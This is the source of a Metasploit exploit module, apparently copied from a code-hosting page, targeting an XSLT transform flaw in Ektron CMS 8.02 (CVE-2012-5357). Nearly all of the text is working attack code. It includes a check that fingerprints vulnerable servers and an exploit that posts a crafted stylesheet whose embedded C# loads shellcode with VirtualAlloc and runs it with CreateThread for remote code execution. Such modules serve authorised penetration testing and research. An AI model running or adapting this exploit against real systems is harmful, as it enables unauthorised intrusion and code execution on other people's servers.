Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/http/ektron_xslt_exec.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456class MetasploitModule < Msf::Exploit::Remote7Rank = ExcellentRanking89include Msf::Exploit::Remote::HttpClient10include Msf::Exploit::EXE1112def initialize(info = {})13super(update_info(info,14'Name' => 'Ektron 8.02 XSLT Transform Remote Code Execution',15'Description' => %q{16This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The17vulnerability exists due to the insecure usage of XslCompiledTransform, using a18XSLT controlled by the user. The module has been tested successfully on Ektron CMS198.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK20SERVICE privileges.21},22'Author' => [23'Rich Lundeen', # Vulnerability discovery24'juan vazquez', # Metasploit module25'Nicolas "Nicob" Gregoire' # C# code using VirtualAlloc + copy shellcode + CreateThread26],27'License' => MSF_LICENSE,28'References' =>29[30[ 'CVE', '2012-5357'],31[ 'OSVDB', '88107' ],32[ 'URL', 'http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/' ],33[ 'URL', 'http://technet.microsoft.com/en-us/security/msvr/msvr12-016' ]34],35'Payload' =>36{37'Space' => 2048,38'StackAdjustment' => -350039},40'Platform' => 'win',41'Privileged' => true,42'Targets' =>43[44['Windows 2003 SP2 / Ektron CMS400 8.02', { }],45],46'DefaultTarget' => 0,47'DisclosureDate' => '2012-10-16'48))4950register_options(51[52OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),53OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/'])54])55end5657def check5859fingerprint = rand_text_alpha(5 + rand(5))60xslt_data = <<-XSLT61<?xml version='1.0'?>62<xsl:stylesheet version="1.0"63xmlns:xsl="http://www.w3.org/1999/XSL/Transform"64xmlns:msxsl="urn:schemas-microsoft-com:xslt"65xmlns:user="http://mycompany.com/mynamespace">66<msxsl:script language="C#" implements-prefix="user">67<![CDATA[68public string xml()69{70return "#{fingerprint}";71}72]]>73</msxsl:script>74<xsl:template match="/">75<xsl:value-of select="user:xml()"/>76</xsl:template>77</xsl:stylesheet>78XSLT7980res = send_request_cgi(81{82'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",83'version' => '1.1',84'method' => 'POST',85'ctype' => "application/x-www-form-urlencoded; charset=UTF-8",86'headers' => {87"Referer" => build_referer88},89'vars_post' => {90"xml" => rand_text_alpha(5 + rand(5)),91"xslt" => xslt_data92}93})9495if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/96return Exploit::CheckCode::Vulnerable97end98return Exploit::CheckCode::Safe99end100101def uri_path102uri_path = target_uri.path103uri_path << "/" if uri_path[-1, 1] != "/"104uri_path105end106107def build_referer108if datastore['SSL']109schema = "https://"110else111schema = "http://"112end113114referer = schema115referer << rhost116referer << ":#{rport}"117referer << uri_path118referer119end120121def exploit122123print_status("Generating the EXE Payload and the XSLT...")124fingerprint = rand_text_alpha(5 + rand(5))125126xslt_data = <<-XSLT127<?xml version='1.0'?>128<xsl:stylesheet version="1.0"129xmlns:xsl="http://www.w3.org/1999/XSL/Transform"130xmlns:msxsl="urn:schemas-microsoft-com:xslt"131xmlns:user="http://mycompany.com/mynamespace">132<msxsl:script language="C#" implements-prefix="user">133<![CDATA[134135private static UInt32 MEM_COMMIT = 0x1000;136private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;137138[System.Runtime.InteropServices.DllImport("kernel32")]139private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);140141[System.Runtime.InteropServices.DllImport("kernel32")]142private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);143144public string xml()145{146string shellcode64 = @"#{Rex::Text.encode_base64(payload.encoded)}";147byte[] shellcode = System.Convert.FromBase64String(shellcode64);148UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);149System.Runtime.InteropServices.Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);150IntPtr hThread = IntPtr.Zero;151IntPtr pinfo = IntPtr.Zero;152UInt32 threadId = 0;153hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);154return "#{fingerprint}";155}156]]>157</msxsl:script>158<xsl:template match="/">159<xsl:value-of select="user:xml()"/>160</xsl:template>161</xsl:stylesheet>162XSLT163164print_status("Trying to run the xslt transformation...")165res = send_request_cgi(166{167'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",168'version' => '1.1',169'method' => 'POST',170'ctype' => "application/x-www-form-urlencoded; charset=UTF-8",171'headers' => {172"Referer" => build_referer173},174'vars_post' => {175"xml" => rand_text_alpha(5 + rand(5)),176"xslt" => xslt_data177}178})179if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/180print_good("Exploitation was successful")181else182fail_with(Failure::Unknown, "There was an unexpected response to the xslt transformation request")183end184185end186end187188189